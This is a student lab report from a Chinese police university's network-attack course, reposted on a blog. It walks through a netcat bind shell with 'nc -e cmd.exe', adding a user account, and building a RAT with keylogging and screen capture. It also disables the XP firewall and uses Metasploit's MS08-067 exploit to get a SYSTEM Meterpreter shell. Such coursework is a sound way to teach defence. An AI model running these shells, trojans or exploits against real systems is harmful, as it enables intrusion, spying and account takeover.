• 网络对抗技术实验四


    学   号 201421410025

     

    中国人民公安大学

    Chinese people’ public security university

     

    网络对抗技术

    实验报告

     

    实验四

    恶意代码技术

     

     

     

    学生姓名

        戴勇

    年级

    2014级

    区队

     一区队

    指导教师

     高见

     

     

    信息技术与网络安全学院

    201710月23

     

    实验任务总纲

    2016—2017 学年   学期

    一、实验目的

    1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

     

    2.了解并熟悉常用的网络攻击工具,木马的基本功能;

    3.达到巩固课程知识和实际应用的目的。

    二、实验要求

    1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

    2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

    3.软件工具可使用NC、MSF等。

    4.实验结束后,保留电子文档。

    三、实验步骤

    1.准备

    提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

    2.实验环境

    描述实验所使用的硬件和软件环境(包括各种软件工具);

    开机并启动软件office2003或2007、浏览器、加解密软件。

    3.实验过程

    1)启动系统和启动工具软件环境。

    2)用软件工具实现实验内容。

    4.实验报告

    按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

     

    任务一 利用NC控制电脑

     

     NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

     

    实验过程需要两个同学相互配合完成:

     

    步骤一:

      在受害者的机器 (同学A)

    输入下面的命令:
      nc.exe -l -p port -e cmd.exe   进入监听模式

     

    被攻击者的ip为192.168.42.87

    攻击者的ip为192.168.42.88

     


    步骤二:
      在攻击者的机器.
    输入下面的命令:
      nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

     

     

     

     

    步骤三:

     

        在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

     

     可以继续通过命令行做一些事情。

     

    任务二 利用木马控制电脑

     

    实验过程需要两个同学配合:

     

    步骤一:

     

        攻击者的机器. (同学A)
    打开V2014.exe程序或则star RAT,这两个木马功能类似。

     

     

     


    步骤二:
      点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

     

     

     

     

    步骤三:

     

    将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

    步骤四:

     

    在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

     

    步骤四:

     

    在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

     

    1. 文件管理,尝试拷贝文文件管理
    2. 屏幕控制,尝试获取桌面
    3. 键盘记录,尝试获取对方击键记录
    4. 会话管理,重启对方机器,查看是否能自启动上线

     

    会话管理,卸载对方的木马。

     

    任务三 通过漏洞获取shell(合天平台中做) 所有过程截图写博客

    1.查看XPSP3漏洞主机的登录用户及网络配置信息,从下图2可以看出漏洞主机IP为10.1.1.130。使用命令如下: 

           ipconfig 查看网络配置信息,为了更好的演示攻击xp系统实例需要关闭XP系统的防火墙,win+R输入cmd

          运行命令:netsh firewall set opmode mode=disable

     

     

     

    2.查看攻击者主机登陆用户及网络配置信息,从下图3可以看出攻击主机登陆用户为root,IP为10.1.1.128 

          whoami  查看当前登陆用户

          ifconfig 查看网络配置信息

     

     

     

     

     

     

    3.  Metasploit默认使用PostgreSQL存储渗透测试所需的数据表,所以在启动Armitage之前需要首先启动PostgreSQL服务和Metasploit服务,然后再启动armitage,弹出对话框询问是否连接Metasploit的RPC信道,依次选择“connect”、“是”选项。Armitage启动成功后主界面如下图7所示:

          service postgresql start 启动PostgreSQL服务

          service metasploit start 在另一个终端启动Metasploit服务

          armitage 启动Armitage

     

     

    4. 利用Armitage对目标系统进行扫描

         扫描目标网段完整信息,确认目标网络拓扑结构是网络侦查的重要实施方法。依次选择Host-Nmap Scan-Quick Scan(OS detect),弹出对话框填写目标主机所在的10.1.1.0/24。 扫描结果如图3所示,10.1.1.0/24网段一共还存在三台主机,其中10.1.1.130是所重点关注的目标主机。

     

     

    5. Armitage利用MS08_067漏洞攻击XP主机

          完成对目标主机的攻击模块搜索以后,选中10.1.1.130主机右键可以发现多了Attack菜单。这里选择SMB漏洞对XP目标主机进行攻击,依次选择Attack》smb》ms08_067_netapi菜单。

     

       6.攻击完成后,目标主机的图标会发生明显变化,Armitage会自动建立一个驻留在内存的shellcode 也就是Meterpreter,右键打开Meterpreter shell,输入getuid命令查看当前用户的权限是SYSTEM权限,攻击完成。

     

  • 相关阅读:
    Python+fiddler(基于Cookie绕过验证码自动登录)
    Python+selenium(警告框处理)
    Python+selenium(多表单、多窗口切换)
    Python+selenium(定位一组元素)
    Python+selenium登录测试
    【转载】python format遇上花括号{}
    【转载】判断当前使用的编译器及操作系统
    动态库的创建,隐式加载和显式加载
    Google C++单元测试框架GoogleTest---AdvancedGuide(译文)
    三次样条插值 cubic spline interpolation
  • 原文地址:https://www.cnblogs.com/P201421410025/p/7751111.html
Copyright © 2020-2023  润新知